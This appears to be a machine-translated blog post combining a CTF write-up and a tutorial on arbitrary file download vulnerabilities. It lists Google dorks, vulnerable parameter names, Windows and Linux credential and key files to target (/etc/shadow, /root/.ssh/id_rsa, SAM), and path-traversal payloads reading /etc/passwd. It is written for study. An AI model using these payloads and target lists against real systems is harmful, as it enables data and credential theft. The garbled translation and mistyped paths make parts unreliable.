Preface:
Previously had contact with this knowledge, there is just this one question exam this knowledge, you learn in detail about the arbitrary file download vulnerability
Download any loopholes Profile
Due to business needs, many sites often need to provide documentation (attachment) download function blocks, but if the file is downloaded restrictions do not directly download their files through the absolute path, then the malicious user can use this server to download sensitive files on the server for further threats and attacks.
Download any harm vulnerability
By downloading any files, you can download any file server, web service configuration information specific code, and server systems, you can also download configuration information in the database, as well as internal network information to detect, and so on.
By briefly above, we can see any download vulnerability is very common, if users view or download the file does not limit, but it could be exploited, causing damage, then on to learn how to either download vulnerability utilization.
Use any vulnerability download
Existence
Links from the point of view, similar to these, it is possible to download any loopholes exist
download.php?path=
download.php?file=
down.php?file=
data.php?file=
readfile.php?file=
read.php?filename=
Analytical title
Here to do a question as an example
view the source code and found this format, speculation may download any file or files containing
open and found a page written in java
then we can consider whether you can do with any vulnerability download this approach, try, but the strange thing is whether we construct any parameters are Not Found, the chef told me that this question needs to switch the request method for the job or the teacher experience deep
Input, you can really find
filename=WEB-INF/web.xml
There are two key files found the location of the flag, first take a look atcom.wm.ctf.FlagController
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
Found a string of base64, decoding can be derived flag
This question involves a lot of knowledge, take a closer look, he said:
First, we see that this is written in java web pages and WEB-INF directory of Java is safety of WEB applications.
The WEB-INF folder in addition to web.xml
, but also keep a classes
folder to place the *.class
files, these *.class
files are written in web design library staff to achieve the jsp
separation of the page foreground and background art services, makes the maintenance of the website is very easy to use. web.xml
File deployment descriptor XML file for the site, the deployment of the site is very important.
This is why we start to see the direct WEB-INF/web.xml
cause of the
Summarize here WEB-INF directory or file common
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
Knowing this, the above problem really is not difficult, you just examine whether a comprehensive knowledge
Vulnerability summary
Download any vulnerabilities can be searched by Google
inurl : readfile.php?file=
inurl : download.php?file=
From the point of view parameter name, roughly:
&readpath=
&filepath=
&Path=
&inputfile=
&url=
&Lang=
&dis=
&data=
&readfile=
&menu=
META-INF=
WEB-INF
These parameters may be loopholes (of course, to see how the management side protection)
To summarize linux download and use Windows files
windows:
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
linux
root/.ssh/authorized_keys////如需登录到远程主机,需要到.ssh目录下,新建authorized_keys文件,并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa//ssh私钥,ssh公钥是id_rsa.pub
/root/.ssh/id_ras.keystore//记录每个访问计算机用户的公钥
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow//账户密码文件
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
Vulnerability verification
xxx.php?f=../../../../../../etc/passwd
xxx.php?f=../index.php
xxx.php?f=file:///etc/passwd
Parameter f parameter values PHP file:
1.文件被解析,则是文件包含漏洞
2.显示源代码,则是文件查看漏洞
3.提示下载,则是文件下载漏洞
Various file path
and finally provide a summary of resources Gangster
to sum up
Too much food, have a good school, the next write is not very detailed, go left to see qwzf Gangster blog